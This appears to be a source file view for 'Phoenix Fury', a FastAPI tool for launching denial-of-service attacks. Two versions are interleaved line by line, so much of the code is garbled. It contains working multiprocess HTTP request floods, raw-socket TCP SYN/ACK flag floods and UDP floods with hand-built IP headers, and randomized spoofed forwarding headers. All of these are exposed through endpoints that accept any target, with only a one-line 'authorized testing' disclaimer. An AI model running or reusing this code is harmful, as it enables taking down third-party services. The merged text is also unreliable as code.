13 / main.py
Samuraiog's picture
Update main.py
fefaa90 verified
raw
history blame
32.9 kB
#!/usr/bin/env python3import socket
"""import struct
Phoenix Fury v8.0 - NUCLEAR MODEimport random
Maximum CPU/RAM utilization for extreme RPSimport time
"""import multiprocessing
import socketimport threading
import multiprocessingimport asyncio
import timeimport aiohttp
import osimport os
from ctypes import c_ulonglongimport sys
from fastapi import FastAPI, BackgroundTasksimport psutil
from pydantic import BaseModelimport ssl
import uvicornfrom typing import Literal, List, Union
from ctypes import c_ulonglong
app = FastAPI(title="Phoenix Fury v8.0 - NUCLEAR MODE")
# Use uvloop for a significant performance boost
# ============================================================================try:
# AUTO-CONFIG: USE ALL AVAILABLE RESOURCES import uvloop
# ============================================================================ asyncio.set_event_loop_policy(uvloop.EventLoopPolicy())
CPU_COUNT = os.cpu_count() or 8except ImportError:
# NUCLEAR MODE: 64 processes per CPU core! pass
TOTAL_PROCESSES = CPU_COUNT * 64 # 48 cores = 3,072 processes
REQUESTS_PER_BURST = 1000 # Each process sends 1000 reqs per connectionfrom fastapi import FastAPI, HTTPException, BackgroundTasks
from pydantic import BaseModel, Field
print(f"[NUCLEAR MODE] {CPU_COUNT} cores detected")import uvicorn
print(f"[NUCLEAR MODE] Spawning {TOTAL_PROCESSES} attack processes")
print(f"[NUCLEAR MODE] Expected: {TOTAL_PROCESSES * 200:,} - {TOTAL_PROCESSES * 1000:,} RPS")# --- Application Setup ---
app = FastAPI(
# ============================================================================ title="🔥 Phoenix Fury API v7.0 - MAXIMUM POWER Edition",
# MODELS description="Extreme stress testing tool with auto-optimized settings for maximum RPS/PPS. For authorized testing only.",
# ============================================================================ version="7.0.0"
class AttackConfig(BaseModel):)
target: str
port: int = 80# --- Auto-Optimized Configuration ---
duration: int = 60CPU_COUNT = psutil.cpu_count(logical=True) or 8
TOTAL_RAM_GB = psutil.virtual_memory().total / (1024 ** 3)
# ============================================================================
# ULTRA-AGGRESSIVE WORKER - MAXIMUM SPEED# REALISTIC CONFIG - Fewer processes that actually work
# ============================================================================def calculate_optimal_config():
def nuclear_worker(worker_id, target_ip, port, stop_flag, counter): """Calculate reasonable process count."""
""" # MUCH FEWER processes - focus on making them work!
Ultra-aggressive worker: tight loop, no error handling, maximum speed. if CPU_COUNT >= 32:
""" MAX_PROCESSES = CPU_COUNT * 2 # 64-96 processes for 32-48 cores
# Pre-build request (minimal) elif CPU_COUNT >= 16:
request = f"GET /?w={worker_id}&c={{}} HTTP/1.1\r\nHost: {target_ip}\r\n\r\n".encode() MAX_PROCESSES = CPU_COUNT * 3 # 48 processes for 16 cores
elif CPU_COUNT >= 8:
local_count = 0 MAX_PROCESSES = CPU_COUNT * 4 # 32 processes for 8 cores
req_num = 0 elif CPU_COUNT >= 4:
MAX_PROCESSES = CPU_COUNT * 6 # 24 processes for 4 cores
# INFINITE LOOP: Connect → Blast requests → Reconnect else:
while not stop_flag.value: MAX_PROCESSES = CPU_COUNT * 8 # 16 processes for 2 cores
sock = None
try: REQUESTS_PER_CONNECTION = 500 # Send 500 requests per socket
# Fast socket creation total_capacity = MAX_PROCESSES * REQUESTS_PER_CONNECTION
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1) return MAX_PROCESSES, REQUESTS_PER_CONNECTION, total_capacity
sock.settimeout(2)
sock.connect((target_ip, port))MAX_PROCESSES, MAX_CONCURRENCY_PER_PROCESS, TOTAL_WORKERS = calculate_optimal_config()
STATS_BATCH_UPDATE_SIZE = 100 # Smaller batches for better feedback
# BLAST REQUESTS - No delays, no checks
for _ in range(REQUESTS_PER_BURST):# --- L7 Enhanced Headers Pool ---
try:USER_AGENTS = [
sock.send(request.replace(b"{}", str(req_num).encode())) "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/121.0.0.0 Safari/537.36",
local_count += 1 "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 Safari/537.36",
req_num += 1 "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 Chrome/121.0.0.0 Safari/537.36",
except: "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0",
break "Mozilla/5.0 (iPhone; CPU iPhone OS 17_0 like Mac OS X) AppleWebKit/605.1.15 Safari/604.1"
]
sock.close()REFERERS = [
except: "https://www.google.com/search?q=",
pass # Ignore ALL errors, keep going "https://www.bing.com/search?q=",
"https://www.facebook.com/",
# Update shared counter every 500 requests "https://www.twitter.com/",
if local_count >= 500: "https://www.reddit.com/",
counter.value += local_count "https://www.youtube.com/"
local_count = 0]
# Final updatedef get_random_headers() -> dict:
if local_count > 0: """Generates randomized headers with IP spoofing for L7 attacks."""
counter.value += local_count return {
"User-Agent": random.choice(USER_AGENTS),
# ============================================================================ "Referer": random.choice(REFERERS) + str(random.randint(1000, 9999)),
# ATTACK MANAGER "X-Forwarded-For": f"{random.randint(1,254)}.{random.randint(1,254)}.{random.randint(1,254)}.{random.randint(1,254)}",
# ============================================================================ "X-Real-IP": f"{random.randint(1,254)}.{random.randint(1,254)}.{random.randint(1,254)}.{random.randint(1,254)}",
class NuclearAttackManager: "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
def __init__(self): "Accept-Language": "en-US,en;q=0.9",
self.active = False "Accept-Encoding": "gzip, deflate, br",
self.processes = [] "Cache-Control": "no-cache",
self.stop_flag = multiprocessing.Value('i', 0) "Pragma": "no-cache"
self.counter = multiprocessing.Value(c_ulonglong, 0) }
self.start_time = 0
# ====================================================================================
def launch(self, target: str, port: int, duration: int):# Pydantic API Models (Simplified - Auto Max Settings)
"""Launch nuclear attack with ALL processes."""# ====================================================================================
if self.active:class BaseAttackConfig(BaseModel):
return target: str = Field(..., description="Target hostname or IP address")
port: int = Field(..., ge=1, le=65535, description="Target port")
self.active = True duration: int = Field(60, ge=10, le=7200, description="Attack duration in seconds")
self.stop_flag.value = 0
self.counter.value = 0class L4TCPConfig(BaseAttackConfig):
self.start_time = time.time() method: Literal["syn", "ack", "fin", "rst", "psh", "urg"] = Field("syn", description="TCP flag for the attack")
self.processes = []
class L4UDPConfig(BaseAttackConfig):
# Resolve target method: Literal["flood", "pps"] = Field("flood", description="'flood' for large packets, 'pps' for minimal packets")
try: payload_size: int = Field(1400, ge=0, le=1472, description="Size of UDP payload. 0 for PPS mode.")
target_ip = socket.gethostbyname(target.replace("http://", "").replace("https://", "").split("/")[0])
except:class L7Config(BaseAttackConfig):
target_ip = target method: Literal["get", "post", "head"] = Field("get", description="HTTP method.")
path: str = Field("/", description="Request path")
print(f"\n{'='*70}")
print(f"🔥 NUCLEAR ATTACK LAUNCHED")class StatusResponse(BaseModel):
print(f" Target: {target_ip}:{port}") attack_active: bool
print(f" Processes: {TOTAL_PROCESSES:,}") attack_type: str
print(f" Duration: {duration}s") target_host: str
print(f"{'='*70}\n") target_ip: str
port: int
# Spawn ALL processes at once duration: int
for i in range(TOTAL_PROCESSES): elapsed_time: float
p = multiprocessing.Process( processes: int
target=nuclear_worker, total_sent: int
args=(i, target_ip, port, self.stop_flag, self.counter) current_rate_pps_rps: float
) cpu_usage_percent: float
p.start() memory_usage_percent: float
self.processes.append(p)
# ====================================================================================
# Stats reporter# CORE NETWORKING & PACKET CRAFTING
def report_stats():# ====================================================================================
last_count = 0def check_root() -> bool:
last_time = time.time() """Check if running with root/admin privileges."""
try:
while not self.stop_flag.value: return os.geteuid() == 0
time.sleep(2) except AttributeError:
now = time.time() import ctypes
current = self.counter.value return ctypes.windll.shell32.IsUserAnAdmin() != 0
rps = (current - last_count) / (now - last_time)
elapsed = now - self.start_timedef resolve_target(target: str) -> str:
"""Resolve hostname to IP address."""
print(f"[{elapsed:.0f}s] Total: {current:,} | Current RPS: {rps:,.0f}") try:
if "://" in target:
last_count = current target = target.split("://")[1].split("/")[0]
last_time = now return socket.gethostbyname(target)
except socket.gaierror:
import threading raise ValueError(f"Could not resolve hostname: {target}")
stats_thread = threading.Thread(target=report_stats, daemon=True)
stats_thread.start()def get_local_ip(target_ip: str) -> str:
"""Get local IP address that routes to target."""
# Auto-stop after duration try:
def auto_stop(): s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
time.sleep(duration) s.connect((target_ip, 1))
self.terminate() ip = s.getsockname()[0]
s.close()
stop_thread = threading.Thread(target=auto_stop, daemon=True) return ip
stop_thread.start() except:
return "127.0.0.1"
def terminate(self):
"""Stop all processes."""def calculate_checksum(data: bytes) -> int:
if not self.active: """Calculate IP/TCP/UDP checksum."""
return s = 0
if len(data) % 2:
print("\n⚠️ Terminating attack...") data += b'\0'
self.stop_flag.value = 1 for i in range(0, len(data), 2):
s += (data[i] << 8) + data[i+1]
# Give processes 3 seconds to finish s = (s >> 16) + (s & 0xffff)
time.sleep(3) s += (s >> 16)
return (~s) & 0xffff
# Force kill remaining
for p in self.processes:def create_ip_header(src_ip: str, dst_ip: str, proto: int, total_len: int) -> bytes:
if p.is_alive(): """Create IP header."""
p.terminate() header = struct.pack('!BBHHHBBH4s4s',
(4 << 4) | 5, 0, total_len, random.randint(1, 65535), 0, 64, proto, 0,
# Wait for all to die socket.inet_aton(src_ip), socket.inet_aton(dst_ip)
for p in self.processes: )
p.join(timeout=1) return header[:10] + struct.pack('!H', calculate_checksum(header)) + header[12:]
# Final statsdef create_tcp_header(src_ip: str, dst_ip: str, src_port: int, dst_port: int, flags: int) -> bytes:
elapsed = time.time() - self.start_time """Create TCP header with specified flags."""
total = self.counter.value seq = random.randint(1, 4294967295)
avg_rps = total / elapsed if elapsed > 0 else 0 ack_seq = 0
header = struct.pack('!HHLLBBHHH', src_port, dst_port, seq, ack_seq, (5 << 4), flags, 5840, 0, 0)
print(f"\n{'='*70}") pseudo_header = struct.pack('!4s4sBBH', socket.inet_aton(src_ip), socket.inet_aton(dst_ip), 0, socket.IPPROTO_TCP, len(header))
print(f"✅ ATTACK COMPLETED") checksum = calculate_checksum(pseudo_header + header)
print(f" Total Requests: {total:,}") return header[:16] + struct.pack('!H', checksum) + header[18:]
print(f" Duration: {elapsed:.2f}s")
print(f" Average RPS: {avg_rps:,.2f}")def create_udp_header(src_ip: str, dst_ip: str, src_port: int, dst_port: int, payload: bytes) -> bytes:
print(f"{'='*70}\n") """Create UDP header."""
udp_len = 8 + len(payload)
self.active = False header = struct.pack('!HHHH', src_port, dst_port, udp_len, 0)
self.processes = [] pseudo_header = struct.pack('!4s4sBBH', socket.inet_aton(src_ip), socket.inet_aton(dst_ip), 0, socket.IPPROTO_UDP, udp_len)
checksum = calculate_checksum(pseudo_header + header + payload)
# Global manager return header[:6] + struct.pack('!H', checksum)
ATTACK_MANAGER = NuclearAttackManager()
# ====================================================================================
# ============================================================================# OPTIMIZED L4 WORKER PROCESS
# API ENDPOINTS# ====================================================================================
# ============================================================================def l4_worker_process(stop_event, shared_counter, target_ip, port, attack_type, method_details):
@app.get("/") """Ultra-optimized L4 worker with raw sockets."""
def root(): try:
return { sock = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW)
"name": "Phoenix Fury v8.0 - NUCLEAR MODE", sock.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1)
"processes": TOTAL_PROCESSES, # Increase socket buffer for higher throughput
"cpu_cores": CPU_COUNT, sock.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, 1024 * 1024)
"status": "READY" if not ATTACK_MANAGER.active else "ATTACKING" local_ip = get_local_ip(target_ip)
} except Exception as e:
print(f"[PID {os.getpid()}] L4 Worker Init Error: {e}", file=sys.stderr)
@app.post("/attack") return
def start_attack(config: AttackConfig, background: BackgroundTasks):
"""Launch nuclear L7 attack.""" local_counter = 0
if ATTACK_MANAGER.active: flag_map = {"syn": 2, "ack": 16, "fin": 1, "rst": 4, "psh": 8, "urg": 32}
return {"error": "Attack already in progress"}
# Pre-generate payloads for UDP
background.add_task( if attack_type == 'udp':
ATTACK_MANAGER.launch, if method_details == 'pps' or method_details == 0:
config.target, payload = b''
config.port, else:
config.duration payload = os.urandom(method_details)
) udp_len = 8 + len(payload)
return { # Packet crafting loop - optimized for speed
"status": "launched", while not stop_event.is_set():
"target": config.target, try:
"port": config.port, src_port = random.randint(10000, 65535)
"processes": TOTAL_PROCESSES,
"expected_rps": f"{TOTAL_PROCESSES * 200:,} - {TOTAL_PROCESSES * 1000:,}" if attack_type == 'tcp':
} ip_header = create_ip_header(local_ip, target_ip, socket.IPPROTO_TCP, 40)
tcp_header = create_tcp_header(local_ip, target_ip, src_port, port, flag_map.get(method_details, 2))
@app.post("/stop") packet = ip_header + tcp_header
def stop_attack(): else: # udp
"""Stop current attack.""" ip_header = create_ip_header(local_ip, target_ip, socket.IPPROTO_UDP, 20 + udp_len)
ATTACK_MANAGER.terminate() udp_header = create_udp_header(local_ip, target_ip, src_port, port, payload)
return {"status": "stopped"} packet = ip_header + udp_header + payload
@app.get("/status") sock.sendto(packet, (target_ip, port))
def get_status(): local_counter += 1
"""Get current attack status."""
if not ATTACK_MANAGER.active: # Batch counter updates for performance
return {"active": False} if local_counter >= STATS_BATCH_UPDATE_SIZE:
with shared_counter.get_lock():
elapsed = time.time() - ATTACK_MANAGER.start_time shared_counter.value += local_counter
total = ATTACK_MANAGER.counter.value local_counter = 0
current_rps = total / elapsed if elapsed > 0 else 0 except:
pass # Ignore errors for maximum speed
return {
"active": True, # Final counter update
"elapsed": round(elapsed, 1), if local_counter > 0:
"total_requests": total, with shared_counter.get_lock():
"current_rps": round(current_rps, 2), shared_counter.value += local_counter
"processes": TOTAL_PROCESSES sock.close()
}
# ====================================================================================
if __name__ == "__main__":# SIMPLE L7 WORKER - BLOCKING SOCKETS THAT ACTUALLY WORK!
multiprocessing.set_start_method('fork', force=True)# ====================================================================================
uvicorn.run(app, host="0.0.0.0", port=8000, workers=1, log_level="warning")def l7_worker_process(stop_event, shared_counter, target_ip, port, path, method, requests_per_conn):
"""L7 worker - SIMPLE blocking approach."""
use_ssl = (port in [443, 8443])
host = target_ip
# Pre-build HTTP request template
http_template = f"GET {path}?_={{}} HTTP/1.1\r\nHost: {host}\r\nUser-Agent: Mozilla/5.0\r\nConnection: keep-alive\r\n\r\n"
local_counter = 0
req_counter = 0
conn_count = 0
print(f"[PID {os.getpid()}] Worker starting...", flush=True)
# TIGHT LOOP: Connect → Send burst → Disconnect → Repeat
while not stop_event.is_set():
sock = None
try:
# Create socket
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, 65536)
sock.settimeout(3)
# Connect
sock.connect((host, port))
conn_count += 1
if use_ssl:
import ssl as ssl_module
context = ssl_module.create_default_context()
context.check_hostname = False
context.verify_mode = ssl_module.CERT_NONE
sock = context.wrap_socket(sock, server_hostname=host)
# Send burst of pipelined requests
for i in range(requests_per_conn):
if stop_event.is_set():
break
try:
request = http_template.format(req_counter).encode()
sock.send(request)
local_counter += 1
req_counter += 1
except Exception as e:
break
# Close connection
try:
sock.close()
except:
pass
except Exception as e:
if conn_count == 0: # First connection failed
print(f"[PID {os.getpid()}] Connection failed: {e}", flush=True)
time.sleep(1)
finally:
if sock:
try:
sock.close()
except:
pass
# Update shared counter in batches
if local_counter >= STATS_BATCH_UPDATE_SIZE:
with shared_counter.get_lock():
shared_counter.value += local_counter
local_counter = 0
# Final update
if local_counter > 0:
with shared_counter.get_lock():
shared_counter.value += local_counter
print(f"[PID {os.getpid()}] Worker stopped: {conn_count} connections, {local_counter} requests", flush=True)
# ====================================================================================
# CENTRALIZED ATTACK MANAGER (SINGLETON)
# ====================================================================================
class AttackManager:
"""Singleton manager for all attacks."""
_instance = None
def __new__(cls):
if cls._instance is None:
cls._instance = super(AttackManager, cls).__new__(cls)
cls._instance._initialized = False
return cls._instance
def __init__(self):
if self._initialized:
return
self._initialized = True
self.lock = threading.Lock()
self.stats_thread = None
self._reset_state()
def _reset_state(self):
"""Reset all attack state."""
self.attack_active = False
self.attack_type = "None"
self.target_host = "None"
self.target_ip = "None"
self.port = 0
self.duration = 0
self.start_time = 0.0
self.process_count = 0
self.processes: List[multiprocessing.Process] = []
self.stop_event = multiprocessing.Event()
self.counter = multiprocessing.Value(c_ulonglong, 0)
self.current_rate = 0.0
def is_active(self):
"""Check if an attack is currently active."""
with self.lock:
return self.attack_active
def _stats_calculator(self):
"""Background thread to calculate current rate."""
last_check_time = time.time()
last_count = 0
while not self.stop_event.is_set():
time.sleep(1)
now = time.time()
current_count = self.counter.value
elapsed = now - last_check_time
if elapsed > 0:
self.current_rate = (current_count - last_count) / elapsed
last_check_time = now
last_count = current_count
self.current_rate = 0.0
def start(self, config: Union[L7Config, L4TCPConfig, L4UDPConfig], family: str):
"""Start an attack with auto-optimized settings."""
with self.lock:
if self.attack_active:
return
try:
self.target_host = config.target
self.target_ip = resolve_target(self.target_host)
if family == 'l4' and not check_root():
raise PermissionError("Layer 4 attacks require root privileges.")
except (ValueError, PermissionError) as e:
print(f"Attack validation failed: {e}", file=sys.stderr)
self._reset_state()
return
self.attack_active = True
self.port = config.port
self.duration = config.duration
self.process_count = MAX_PROCESSES # AUTO MAX
self.start_time = time.time()
worker_target, worker_args, attack_name = (None, None, "Unknown")
if family == 'l7' and isinstance(config, L7Config):
attack_name = f"L7-{config.method.upper()}"
worker_target = l7_worker_process
worker_args = (
self.stop_event,
self.counter,
self.target_ip,
config.port,
config.path,
config.method,
MAX_CONCURRENCY_PER_PROCESS # AUTO MAX
)
elif family == 'l4':
worker_target = l4_worker_process
if isinstance(config, L4TCPConfig):
attack_name = f"L4-TCP-{config.method.upper()}"
worker_args = (
self.stop_event,
self.counter,
self.target_ip,
config.port,
'tcp',
config.method
)
elif isinstance(config, L4UDPConfig):
attack_name = f"L4-UDP-{config.method.upper()}"
worker_args = (
self.stop_event,
self.counter,
self.target_ip,
config.port,
'udp',
config.method if config.method == 'pps' else config.payload_size
)
self.attack_type = attack_name
print("=" * 70)
print(f"🔥 PHOENIX FURY MAXIMUM POWER - ATTACK INITIATED 🔥")
print(f" Type: {self.attack_type}")
print(f" Target: {self.target_host}:{self.port} ({self.target_ip})")
print(f" Duration: {self.duration}s")
print(f" Processes: {self.process_count} (AUTO MAX)")
if family == 'l7':
print(f" Concurrency per Process: {MAX_CONCURRENCY_PER_PROCESS}")
print(f" Total Concurrent Tasks: {self.process_count * MAX_CONCURRENCY_PER_PROCESS:,}")
print("=" * 70)
# Launch all worker processes
for _ in range(self.process_count):
p = multiprocessing.Process(target=worker_target, args=worker_args)
self.processes.append(p)
p.start()
# Start stats calculator
self.stats_thread = threading.Thread(target=self._stats_calculator)
self.stats_thread.start()
def stop(self):
"""Stop the current attack."""
with self.lock:
if not self.attack_active:
return
print(f"\n⚠️ Stop signal received. Terminating {len(self.processes)} processes...")
self.stop_event.set()
# Wait for processes to finish
for p in self.processes:
p.join(timeout=5)
# Force terminate hanging processes
for p in self.processes:
if p.is_alive():
print(f"Terminating hanging process PID: {p.pid}")
p.terminate()
# Stop stats thread
if self.stats_thread:
self.stats_thread.join(timeout=2)
# Calculate final stats
elapsed = time.time() - self.start_time
total_sent = self.counter.value
avg_rate = total_sent / elapsed if elapsed > 0 else 0
print("=" * 50)
print("✅ ATTACK TERMINATED")
print(f" Total Sent: {total_sent:,}")
print(f" Elapsed Time: {elapsed:.2f}s")
print(f" Average Rate: {avg_rate:,.2f} PPS/RPS")
print("=" * 50)
self._reset_state()
def get_status(self) -> StatusResponse:
"""Get current attack status."""
with self.lock:
return StatusResponse(
attack_active=self.attack_active,
attack_type=self.attack_type,
target_host=self.target_host,
target_ip=self.target_ip,
port=self.port,
duration=self.duration,
elapsed_time=round(time.time() - self.start_time, 2) if self.attack_active else 0,
processes=self.process_count,
total_sent=self.counter.value,
current_rate_pps_rps=round(self.current_rate, 2),
cpu_usage_percent=psutil.cpu_percent(),
memory_usage_percent=psutil.virtual_memory().percent
)
MANAGER = AttackManager()
# ====================================================================================
# FASTAPI ENDPOINTS
# ====================================================================================
@app.on_event("startup")
async def on_startup():
"""Startup message with system info."""
print("=" * 80)
print("🔥 Phoenix Fury API v7.0 - EXTREME PERFORMANCE Edition")
print(f" System Auto-Detected:")
print(f" CPU Cores: {CPU_COUNT}")
print(f" RAM: {TOTAL_RAM_GB:.1f} GB")
print(f" ")
print(f" Auto-Optimized Configuration:")
print(f" Worker Processes: {MAX_PROCESSES}")
print(f" Requests per Connection: {MAX_CONCURRENCY_PER_PROCESS:,}")
print(f" ")
print(f" Expected Performance:")
print(f" Estimated RPS: {int(MAX_PROCESSES * 100):,} - {int(MAX_PROCESSES * 500):,}")
print(f" ")
if check_root():
print("✅ Running with root privileges - L4 attacks ENABLED")
else:
print("⚠️ WARNING: Not root - L4 attacks will FAIL")
print("=" * 80)
def run_attack_lifecycle(config: Union[L7Config, L4TCPConfig, L4UDPConfig], family: str, background_tasks: BackgroundTasks):
"""Run attack lifecycle in background."""
if MANAGER.is_active():
raise HTTPException(status_code=409, detail="An attack is already in progress.")
background_tasks.add_task(MANAGER.start, config, family)
background_tasks.add_task(time.sleep, config.duration)
background_tasks.add_task(MANAGER.stop)
@app.post("/attack/layer7")
def api_start_l7(config: L7Config, background_tasks: BackgroundTasks):
"""Start L7 attack with auto-optimized settings."""
run_attack_lifecycle(config, 'l7', background_tasks)
return {
"status": "success",
"message": f"L7 attack initiated on {config.target}:{config.port}",
"processes": MAX_PROCESSES,
"concurrency_per_process": MAX_CONCURRENCY_PER_PROCESS,
"total_workers": MAX_PROCESSES * MAX_CONCURRENCY_PER_PROCESS
}
@app.post("/attack/layer4/tcp")
def api_start_l4_tcp(config: L4TCPConfig, background_tasks: BackgroundTasks):
"""Start L4 TCP attack with auto-optimized settings."""
run_attack_lifecycle(config, 'l4', background_tasks)
return {
"status": "success",
"message": f"L4 TCP {config.method.upper()} attack initiated on {config.target}:{config.port}",
"processes": MAX_PROCESSES
}
@app.post("/attack/layer4/udp")
def api_start_l4_udp(config: L4UDPConfig, background_tasks: BackgroundTasks):
"""Start L4 UDP attack with auto-optimized settings."""
run_attack_lifecycle(config, 'l4', background_tasks)
return {
"status": "success",
"message": f"L4 UDP {config.method.upper()} attack initiated on {config.target}:{config.port}",
"processes": MAX_PROCESSES
}
@app.post("/attack/stop")
def api_stop_attack():
"""Stop the current attack."""
if not MANAGER.is_active():
return {"status": "info", "message": "No attack is currently running."}
MANAGER.stop()
return {"status": "success", "message": "Stop signal sent."}
@app.get("/status", response_model=StatusResponse)
def get_status():
"""Get current attack status and system metrics."""
return MANAGER.get_status()
@app.get("/")
def root():
"""Root endpoint with API info."""
return {
"message": "🔥 Phoenix Fury API v7.0 - MAXIMUM POWER Edition",
"docs": "/docs",
"system": {
"cpu_cores": CPU_COUNT,
"ram_gb": round(TOTAL_RAM_GB, 1),
"worker_processes": MAX_PROCESSES,
"requests_per_connection": MAX_CONCURRENCY_PER_PROCESS,
"estimated_rps": f"{int(MAX_PROCESSES * 100):,} - {int(MAX_PROCESSES * 500):,}"
}
}
# --- Main Execution ---
if __name__ == "__main__":
multiprocessing.freeze_support()
uvicorn.run(app, host="0.0.0.0", port=8000, workers=1)